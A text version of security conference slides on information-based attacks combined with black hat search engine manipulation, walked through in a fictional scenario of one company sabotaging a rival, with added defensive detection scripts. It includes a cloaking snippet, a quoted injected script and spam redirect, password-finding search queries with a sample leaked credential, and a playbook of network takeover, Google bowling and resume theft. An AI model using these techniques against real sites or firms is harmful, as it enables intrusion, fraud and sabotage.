Small treatise about e-manipulation for honest people

Information based attacks in the Internet

Frédéric Raynal, Sogeti / Cap Gemini – MISC magazine
fred(at)security-labs.org, frederic.raynal(at)sogeti.com

François Gaspard, New Zealand Telecom International
fg(at)tnzi.com, kad(at)miscmag.com


Source PDF: esec-lab.sogeti.com/static/publications/08-eicar-emanipulation.pdf


Storybook

Attacking with no limit

Information warfare: often restricted to information as content

Hacking: often restricted to a technical exploit

What if we merge both?

⇒ Attacking with both the content and the container

Information based operations: deception, intoxication, misinformation, . . .

Technical operation: Search Engine Optimization as a means to emphasize the information we want


Roadmap

1 Information based attacks

2 Search engine optimization

3 Once upon a time. . .


(Short and inaccurate) Summary of Information warfare

2 kinds of orientation

Information management in order to achieve information dominance

Use information to produce knowledge

Others have to run after you to keep up-to-date

Information used as a weapon

Dominance is one goal, not the only one

Think also of deception, intoxication or misinformation, . . .


Information based attacks (IBA)

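[Figure: the four phases of an information based attack: Collect, Recruit, Arm, Propagate. Labels in the figure: Human, Newspapers, Internet; Consumers, Researchers, Journalists; Articles, Interviews, Books; Newspapers, leaflets, Web sites]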


Roadmap

1 Information based attacks: Collect, Recruit, Arm, Propagate

2 Search engine optimization

3 Once upon a time. . .


Collect

Where to gather information on the Internet

Google, MSN, Yahoo, . . . only see 10% of the web!

Ex.: social network websites (LinkedIn, orkut, Twitter, Facebook, . . . )

Use the appropriate tool depending on the information you are looking for:

Ex.: Federal Funding Accountability and Transparency Act (FFATA) for contracts with the US government

The perimeter of a network has gone from known to blurred

The perimeter of information is out of control. . .


Google Hacking

Fun and profits

Finding passwords

inurl:passwd.txt (1st result in google.com: WebAdmin:aeYYajmW204V6)

Owned websites

intitle:"hacked by" : imaginative pictures. . .

intitle:tt2.swi : compromised websites installing a java trojan

Entertainment

intitle:"Live View / - AXIS" | inurl:view/view.shtml : some surveillance cams

site:free.fr intitle:"index of" mp3 : p2p outdated


Recruit

Populate the attackers

Infiltrate where they already are

Stay hidden as much as possible: Tor, open proxies, open WiFi, . . .

Create your own protest

Opposition website: federate all opponents in one place


Opposition website : jeboycotteDanone.com


Arm : battlefield == the Internet

There is life outside the Internet

Consequences of, and answers to, our actions can be led outside of the Internet

Combining it with other battlefields is more efficient: lawsuits, finance, information in newspapers or leaflets, . . .

Internet howto

Websites are spread all over the Internet

Add websites under your control

A human looks for information

Spread information on the Internet, push it to the user

The results are found according to search engines

Change the results by tricking the search engines


Usual attacks

Using information to attack

Intoxication: attempt to misguide the interpretations and the reasoning of the target, that is, its analysis capacities

Ex.: spreading wrong information, "false/false" strategy

Ex.: change the content of a website according to who comes

Deception: can be based either on hiding (e.g. camouflage, blinding) or on simulation (create, lure, invent)

Ex.: WW2, when false military bases were created in order to deceive the Germans about the D-Day location

Ex.: abuse search engines to warp the results

Misinformation: based on alteration, removal, addition and so on of information

Ex.: the supposed lethal benzene in the bottles of Perrier

Ex.: hoaxes, rumors spreading from one forum to another, then by mail, and so on


Propagate

Organize knowledge to export the battle

Increase the doubts toward the target in the public

Increase the bad consciousness of the target itself

Questions and answers

What if you can increase the perception of all our vectors and, at the same time, decrease the perception of the target's answers?

⇒ Where SEO comes into play . . .


Definitions

Web Spam

The practice of manipulating web pages in order to cause search engines to rank some web pages higher than they would without any manipulation.

Search engine optimization (SEO)

SEO is the process of improving the volume and quality of traffic to a website from search engines via "natural" ("organic" or "algorithmic") search results for targeted keywords.


Why/How would I do SEO?

Motives

Users trust search engines as a means of finding information

⇒ Exploit this trust

Users usually do not look past the first ten results returned by the search engine

⇒ Exploit this laziness

A matter of color

White hat SEO: a site conforms to the search engines' guidelines and involves no deception

Black hat SEO: attempts to improve rankings in ways that are disapproved of by the search engines, or involve deception


Roadmap

1 Information based attacks

2 Search engine optimization: White Hat SEO, Black Hat SEO, Advanced examples, Aggressive Black Hat SEO

3 Once upon a time. . .


A quick overview of White Hat SEO

Usual guidelines

Keywords: be creative, avoid generic keywords

Architecture: page rank computed according to {in|out}coming links

Content: needs to be innovative and refreshed regularly

⇒ Guidelines are not written as a series of rules

Strategy: long term, no deception

Create content for users, not for search engines

Make that content easily accessible to the spiders

⇒ Content indexed by SE is the same as the one seen by users


A quick overview of Black Hat SEO

Spam web for profit: online pharmacy industry

Many industries prefer not to spam directly (due to anti-spam laws in the US & Europe)

They create an affiliate program

⇒ Sales increase: regular income thanks to affiliates

⇒ Limited liability: affiliates used as scapegoats

How do some affiliate programs allow spam?

No terms of agreement at the sign-up page

Some companies operate in jurisdictions where spam is not illegal (ex. Seychelles)

Spam is "restricted" to email spam


Black Hat SEO is a myth. . . or not


A quick overview of Black Hat SEO

Strategy: short term, deception

Content indexed by SE is often different from the one seen by users

Most techniques are nasty, some are illegal

A few basic examples

Content spam: altering the view of a SE over a page

Invisible text, keyword stuffing, doorway pages, scraper sites, . . .

Link spam: take advantage of link-based ranking algorithms

Link farms, hidden links, sybil attacks, spam blogs, page hijacking, . . .

World-writable spam: add links to sites editable by users

Blog entries, forums, wikis, referrer spamming, . . .


Cloaking

Goal

Modify the content of the page according to the parameters

Cloaking for dummies

User agent cloaking: change page depending on who comes

    // strpos() returns 0 for a match at offset 0, so compare against false
    if (strpos($_SERVER["HTTP_USER_AGENT"], "Googlebot") !== false) {
        include("googlebot-special.html");
    } else {
        // display real page
    }

IP cloaking: change page depending on where a request comes from

    $ip = strval($_SERVER["REMOTE_ADDR"]);
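Added example (not from the original slides): a check a site owner or search-quality analyst can run against user agent cloaking, by requesting the same URL as a crawler and as a browser and comparing the visible text. The fetch hook, the two sample sites and the 0.5 threshold are assumptions made for this sketch; the sample pages are constructed so that it runs offline.

```python
import itertools
import re
from html.parser import HTMLParser

CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"


class TextExtractor(HTMLParser):
    """Collect the text a reader sees, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.skip_depth = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self.skip_depth:
            self.skip_depth -= 1

    def handle_data(self, data):
        if not self.skip_depth:
            self.chunks.append(data)


def visible_words(html):
    parser = TextExtractor()
    parser.feed(html)
    parser.close()
    return re.findall(r"[a-z0-9]+", " ".join(parser.chunks).lower())


def shingles(words, k=3):
    """Set of k-word windows; tolerant of small edits such as a changing token."""
    if len(words) < k:
        return {tuple(words)} if words else set()
    return {tuple(words[i:i + k]) for i in range(len(words) - k + 1)}


def jaccard(a, b):
    return 1.0 if not (a or b) else len(a & b) / len(a | b)


def check_cloaking(fetch, url, threshold=0.5):
    """fetch(url, user_agent) -> HTML string (hypothetical HTTP client hook)."""
    crawler = visible_words(fetch(url, CRAWLER_UA))
    browser = visible_words(fetch(url, BROWSER_UA))
    similarity = jaccard(shingles(crawler), shingles(browser))
    return {
        "similarity": round(similarity, 2),
        "cloaked": similarity < threshold,
        "crawler_only_terms": sorted(set(crawler) - set(browser)),
    }


# --- constructed sample sites, no network access ---
REAL_PAGE = ("<html><head><title>New cars</title><style>p{color:red}</style></head>"
             "<body><h1>Our new models</h1><p>Discover the range and book a test drive.</p>"
             "<p>Session SID</p></body></html>")
SPIDER_PAGE = ("<html><body><h1>used cars</h1><p>used cars cheap used cars buy "
               "used cars best used cars dealer used cars</p></body></html>")
request_ids = itertools.count(1)


def cloaking_site(url, user_agent):
    # Same decision as the PHP on the slide: a special page for Googlebot.
    if "Googlebot" in user_agent:
        return SPIDER_PAGE
    return REAL_PAGE.replace("SID", str(next(request_ids)))


def honest_site(url, user_agent):
    # One page for everyone; only a per-request token differs.
    return REAL_PAGE.replace("SID", str(next(request_ids)))


if __name__ == "__main__":
    print("cloaking site:", check_cloaking(cloaking_site, "http://site.example/"))
    print("honest site:  ", check_cloaking(honest_site, "http://site.example/"))
```

Swapping the user agent does not expose the IP cloaking also shown on the slide; for that, the comparison has to use the content the search engine reports having indexed.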


A(n in)famous example : spider view of bmw.de


A(n in)famous example : human view of bmw.de


Solving captcha

Goal

Automatic registration to forums, post comments on blogs, . . .

Captcha for dummies

Remove the background : denoising

Join points in the letters : filtering

Derotate the letters : geometric transformation

Read the letters : pattern recognition


Solving captcha: phpbb2


Real case : who wants certified viagra (1/3)


Real case : certified viagra at university (2/3)

http://spirit.dos.uci.edu/interfaith/?page=254

User clicks on 2nd answer, trusting the .edu

PR: 6/10 – Backlinks: 3420

Site runs Nucleus CMS v3.23 (current: 3.32)

Flaw in default skin allows code to be injected into generated pages:

    <script src="http://focusa.net/gcoxiio.js"></script>

gcoxiio.js redirects depending on the referer:

Referer: www.google.fr/search?q=certified+viagra&ie=utf-8

Redirection:

    if (document.referrer.toLowerCase().indexOf('viagra') != -1)
        location.href = 'http://pillsonline.biz/viagra.htm';

User is redirected to http://pillsonline.biz/viagra.htm
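Added example (not from the original slides): a site owner's audit for the compromise described above, listing scripts loaded from hosts outside an allowlist and flagging any script that reads the referrer and then navigates away. The host names, the allowlist, the fetch hook and the sample HTML and JavaScript are constructed for this sketch, and the regular expressions are a heuristic rather than a JavaScript parser.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

REFERRER_READ = re.compile(r"document\s*\.\s*referrer")
NAVIGATION = re.compile(
    r"\blocation\s*(?:\.\s*href\s*)?=(?!=)|\blocation\s*\.\s*(?:replace|assign)\s*\("
)
# String or regex literal the referrer is tested against.
REFERRER_TEST = re.compile(
    r"referrer[^;{]*?\.\s*(?:indexOf|includes|search|match)\s*\(\s*['\"/]([^'\"/]+)"
)
# Literal absolute URL used as a navigation target.
DEST = re.compile(r"\blocation[^;\n]*?['\"](https?://[^'\"]+)['\"]")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self.in_script, self.buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src.strip())
            self.in_script, self.buf = True, []

    def handle_data(self, data):
        if self.in_script:
            self.buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self.in_script:
            body = "".join(self.buf).strip()
            if body:
                self.inline.append(body)
            self.in_script = False


def script_host(src, page_host):
    """Host a script loads from; relative URLs resolve to the page's own host."""
    return (urlparse(src).hostname or page_host).lower()


def is_allowed(host, page_host, allowed_hosts):
    return host == page_host or any(
        host == a or host.endswith("." + a) for a in allowed_hosts
    )


def referrer_gated_redirect(js):
    """Return tested keywords and literal targets if js redirects on the referrer."""
    if not (REFERRER_READ.search(js) and NAVIGATION.search(js)):
        return None
    return {"keywords": REFERRER_TEST.findall(js), "destinations": DEST.findall(js)}


def audit_page(html, page_host, allowed_hosts, fetch_script):
    """fetch_script(src) -> JavaScript text or None (hypothetical download hook)."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        host = script_host(src, page_host)
        if is_allowed(host, page_host, allowed_hosts):
            continue
        finding = {"type": "off-site script", "src": src, "host": host}
        body = fetch_script(src)
        hit = referrer_gated_redirect(body) if body else None
        if hit:
            finding["type"] = "off-site script with referrer-gated redirect"
            finding.update(hit)
        findings.append(finding)
    for body in collector.inline:
        hit = referrer_gated_redirect(body)
        if hit:
            findings.append({"type": "inline referrer-gated redirect", **hit})
    return findings


# --- constructed sample: a CMS page with one injected script tag ---
SAMPLE_HTML = """<html><head>
<script src="/skins/default/menu.js"></script>
<script src="https://stats.partner.example/t.js"></script>
<script src="http://cdn.injected.example/x.js"></script>
</head><body><h1>Interfaith calendar</h1></body></html>"""
SAMPLE_SCRIPTS = {
    "http://cdn.injected.example/x.js":
        "if (document.referrer.toLowerCase().indexOf('pills') != -1) "
        "location.href = 'http://shop.injected.example/pills.htm';",
}


def sample_fetch(src):
    return SAMPLE_SCRIPTS.get(src)


if __name__ == "__main__":
    for f in audit_page(SAMPLE_HTML, "www.campus.example", {"partner.example"}, sample_fetch):
        print(f)
```

Because the redirect only fires for visitors arriving from a search result, a page opened directly by its maintainer looks normal; inspecting the script source as above does not depend on the referrer.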


Real case : pills online (3/3)


Black Hat SEO reversed

Goal

Decrease the page rank of competitors' websites

Some nasty but legal ideas. . .

Inject poison keywords into the target's website: sex, drug, medicine, viagra, casino. . .

Google bowling: add links to the target from many bad sites

Even better with blacklisted websites!

Google Washing: use an old domain you own to duplicate the content of the target's website, then report the target as duplicate content ⇒ SE will ban the newest

And many more!!!


Situation

Players

Proctor: a French IT consulting company

Limited resources, driven by cost killing

Tonton: an Indian IT consulting company

Many men at work, cheaper than European ones

Comments

Goal: Tonton wants to enter the European market

Vector: buy a well-known local company, Proctor

Means: exhaust Proctor's resources so that it needs help

Limit: do not deteriorate Proctor's image too much


Roadmap

1 Information based attacks

2 Search engine optimization

3 Once upon a time. . .: The main strategy, White ops based on SEO, Black ops based on hacking


Buying Proctor : the main strategy

Marry me

Tonton proposes a partnership to Proctor:

A big big (and lucrative) contract in India, where Proctor wants to grow

Proctor must propose to Tonton other contracts in Europe, where Proctor wants to find partners

The 1st Indian contract is really interesting for Proctor

Tonton next gives other (rotten) contracts to Proctor on the Indian markets

Results

Proctor: resources consumed in several markets, new businesses, lawsuits

Tonton: internal view of Proctor, cheaper resources involved


Buying Proctor : the main strategy

[Diagram. Labels: India; Tonton & Proctor negotiate; T & P answer (and win) a 1st big contract; Contract for P; Lot of work, small benefits; Lawsuits; Contract for P; Contract for T. Legend: T: Tonton (Indian company), P: Proctor (European company), PR: Public Relations]


Buying Proctor : drug the salesmen of Proctor

Happiness or deception for the groom

Provide a nice clients list to several salesmen ⇒ consume energy trying to reach them

Invitations to tender: identify them and give them to Proctor ⇒ consume energy trying to win them

Hire away salesmen: show them life is better somewhere else ⇒ cause internal tensions and resignations

Results

Proctor: salesmen will be busier than they have ever been, the goal being to saturate them

Tonton: learn the European market with the watcher, wait for exhaustion


Buying Proctor : drug the salesmen

[Diagram. Labels: India; Tonton & Proctor negotiate; T & P answer (and win) a 1st big contract; Contract for P; Lot of work, small benefits; Lawsuits; Contract for P; Contract for T; Paris; Clients list given to salesmen; T puts watchers on .fr's markets; Many invitations to tender; Hire away salesmen; T + PR; Exhibitions; Visitors lists. Legend: T: Tonton (Indian company), P: Proctor (European company), PR: Public Relations]


Buying Proctor : life-in-IT-consulting.org

Time for opposition

Currently no website on life and business in IT consulting ⇒ create one, promote it

Use contacts found during information gathering to provide inputs

Contact a PR agency to promote the articles (propose interesting and new content!!!)

Use white hat SEO to reinforce the visibility

Never target Proctor directly

⇒ We have created a very efficient long-term influence tool


Buying Proctor : life-in-IT-consulting.org

[Scenario diagram, repeated from the "drug the salesmen" slide with the same legend and labels, plus new labels: SEO; www.Life-in-it-consulting.org; Workers; Former workers; Clients; PR => press; "bad" content; salary study; inform]


Buying Proctor : aggressive SEO to shut up Proctor

The sound of silence

Google bowling : create many backlinks to Proctor from "bad" websites (racist, sex, drugs, online casino, ...)

Create "bad" websites with the same keywords as Proctor

Use blacklisted websites to link with Proctor

Duplicate content : find or create duplicate content on Proctor's website

Use blogs, forums, ..., to have many links pointing to the same page

http://proctor.com/blogs?lang=fr

http://proctor.com/blogs?lang=en

Link farm : automatically create many websites dealing with Proctor having many many many links to Proctor
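
Seen from the targeted site, Google bowling and link farms show up as an abrupt change in the backlink profile. The following is an added example, not part of the original slides: it flags weeks where unwanted-category referring domains dominate the new backlinks and groups referring domains hosted in the same /24. The record layout, category labels and thresholds are assumptions, and the sample data is constructed.

```python
from collections import defaultdict
from datetime import date
from ipaddress import ip_network

BAD_CATEGORIES = {"casino", "adult", "drugs", "hate"}  # assumed category labels

# Constructed backlink export: (referring domain, first seen, category, host IP).
BACKLINKS = [
    ("partner-a.example", date(2008, 1, 7), "business", "192.0.2.10"),
    ("news-b.example", date(2008, 1, 9), "press", "198.51.100.7"),
    ("casino-1.example", date(2008, 2, 4), "casino", "203.0.113.5"),
    ("casino-2.example", date(2008, 2, 5), "casino", "203.0.113.9"),
    ("pills-3.example", date(2008, 2, 6), "drugs", "203.0.113.20"),
    ("adult-4.example", date(2008, 2, 7), "adult", "198.51.100.99"),
    ("blog-c.example", date(2008, 2, 8), "blog", "192.0.2.77"),
]

def bad_link_surges(backlinks, min_bad=3, min_ratio=0.5):
    """Weeks where unwanted-category domains dominate the newly seen backlinks."""
    weeks = defaultdict(lambda: (set(), set()))  # ISO week -> (new, bad) domains
    for domain, first_seen, category, _ip in backlinks:
        new, bad = weeks[first_seen.isocalendar()[:2]]
        new.add(domain)
        if category in BAD_CATEGORIES:
            bad.add(domain)
    return {week: sorted(bad) for week, (new, bad) in sorted(weeks.items())
            if len(bad) >= min_bad and len(bad) / len(new) > min_ratio}

def shared_hosting_clusters(backlinks, min_domains=3):
    """Referring domains packed into one /24 (assumed here as a link-farm signal)."""
    nets = defaultdict(set)
    for domain, _seen, _category, ip in backlinks:
        nets[str(ip_network(f"{ip}/24", strict=False))].add(domain)
    return {net: sorted(doms) for net, doms in nets.items()
            if len(doms) >= min_domains}

def disavow_lines(domains):
    """Render domains in the 'domain:' syntax of a link disavow file."""
    return [f"domain:{d}" for d in sorted(set(domains))]

if __name__ == "__main__":
    for week, domains in bad_link_surges(BACKLINKS).items():
        print(week, *disavow_lines(domains), sep="\n")
    print(shared_hosting_clusters(BACKLINKS))
```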


Buying Proctor : aggressive SEO to shut up Proctor

[Scenario diagram, repeated from the previous diagram slides with the same legend and labels, plus new labels: SEO; Link farms; Google bowling; Flaw exploitation; Google washing; proctor.com]


Roadmap

1 Information based attacks

2 Search engine optimization

3 Once upon a time. . .

The main strategy

White ops based on SEO

Black ops based on hacking


Buying Proctor : owning the local network

One laptop stolen is the key to everything. . .

[Network diagram. Legend: known password, weak password. Machines and accounts shown:]

Standard station: locadm : ********, locuser : qwerty

Backup Server + master: sv_deploy : d3pl0y75, Administrator : $admin$

Project: rv : rv, Administrator : *******

Printing Server: jdupont : ********, Administrator : (empty)

DB Server: admprov : *******, admsql : ******, srvadm : srv0dm, sqlserver / sa : empty pwd

2 domain controllers: 1289 accounts, 8 admin: Administrator (********), jrichard (********), jdupont (********), jkevin (********), dvador (********), samva (********), cveso (********!), obade (********)

File and printing servers

Several servers (Lotus Notes, mails, ...)

Other labels in the diagram: locadm, rv, admprov, Administrator, jdupont
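
The diagram above is in effect a catalogue of empty, guessable and reused credentials. The following is an added example, not part of the original slides: an audit that flags those same weakness classes in an account inventory. The inventory layout, host names and rule names are assumptions; the weak sample values are the fictional ones shown on the slide, and the remaining entries are constructed.

```python
import re
from collections import defaultdict
from difflib import SequenceMatcher

DELEET = str.maketrans("013457", "oieast")  # undo common digit substitutions
KEYBOARD_WALKS = ("qwerty", "azerty", "asdfgh", "123456")

# Constructed inventory (host, account, password). Host names are hypothetical;
# masked passwords on the slide are replaced by made-up values.
INVENTORY = [
    ("station", "locuser", "qwerty"),
    ("station", "locadm", "Vq7#made-up-1"),
    ("backup", "locadm", "Vq7#made-up-1"),
    ("backup", "sv_deploy", "d3pl0y75"),
    ("backup", "Administrator", "$admin$"),
    ("project", "rv", "rv"),
    ("db", "srvadm", "srv0dm"),
    ("db", "sa", ""),
    ("db", "svc_report", "T9#vLq2!xW"),  # hypothetical account, strong password
]

def weakness(account, password):
    """Return the first matching weakness class, or None."""
    acct, pw = account.lower(), password.lower()
    if not pw:
        return "empty"
    if pw == acct:
        return "same-as-account"
    if any(walk in pw for walk in KEYBOARD_WALKS):
        return "keyboard-walk"
    # Normalise the password, then compare it with the account name and its parts.
    core = re.sub(r"[^a-z0-9]", "", pw.translate(DELEET))
    tokens = [t for t in re.split(r"[^a-z0-9]+", acct) if len(t) >= 4]
    if len(core) >= 4 and (core in acct or any(t in core for t in tokens)
                           or SequenceMatcher(None, core, acct).ratio() >= 0.8):
        return "derived-from-account"
    return None

def audit(inventory):
    """List (host, account, weakness) for every weak credential."""
    return [(h, a, w) for h, a, p in inventory if (w := weakness(a, p))]

def reused_across_hosts(inventory):
    """Map account -> hosts where the same account/password pair is valid."""
    seen = defaultdict(set)
    for host, account, password in inventory:
        seen[(account.lower(), password)].add(host)
    return {a: sorted(h) for (a, _), h in seen.items() if len(h) > 1}
```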


Buying Proctor : owning the local network

[Scenario diagram, repeated from the previous diagram slides with the same legend and labels, plus new labels: LAN; Steal laptop; Own AD; Own SMTP; Own www; noise; Poison keywords; Cloaking]


Buying Proctor : when human (resources) is the weak link

Hiring away people

Focus on identified key people and send them (better) job proposals

Use the access to the LAN to get the resumes of all engineers, spread them on the Internet : some competitors will know what to do with them

Hiring process : hunting ghosts

People tracking resumes on the Internet are searching in the same few sites : make the access to these sites difficult

Either on the proxy or the (shared) storage place, change what looks like an email address or phone number in resumes : people will be much more difficult to reach


Buying Proctor : when human (resources) is the weak link

[Scenario diagram, repeated from the previous diagram slides with the same legend and labels, plus new labels: HR; Hire away; Key people; CVs sent to Recruitment offices; Articles; steal; leak; inform; Recruitment process; Fake resumes; Warp resumes; Sites maintenance]


Conclusion

Mixing everything in a clever way

Attacking with information is complex but difficult to oppose

Attacker has the initiative, a real advantage

Quite easy (with time but no means) to amplify the attack

SEO is a mix of following guidelines, cleverness and hacking

Usually applied on our own website (thus information)

Can also be applied by everyone on anybody's website

⇒ Mixing both is really efficient

The Internet is really well suited to propagate information (e.g. deception, misinformation, intoxication)

Content (information) is emphasized thanks to container (SEO)

Do not forget you can also combine with other tricks from other fields


Q & (hopefully) A
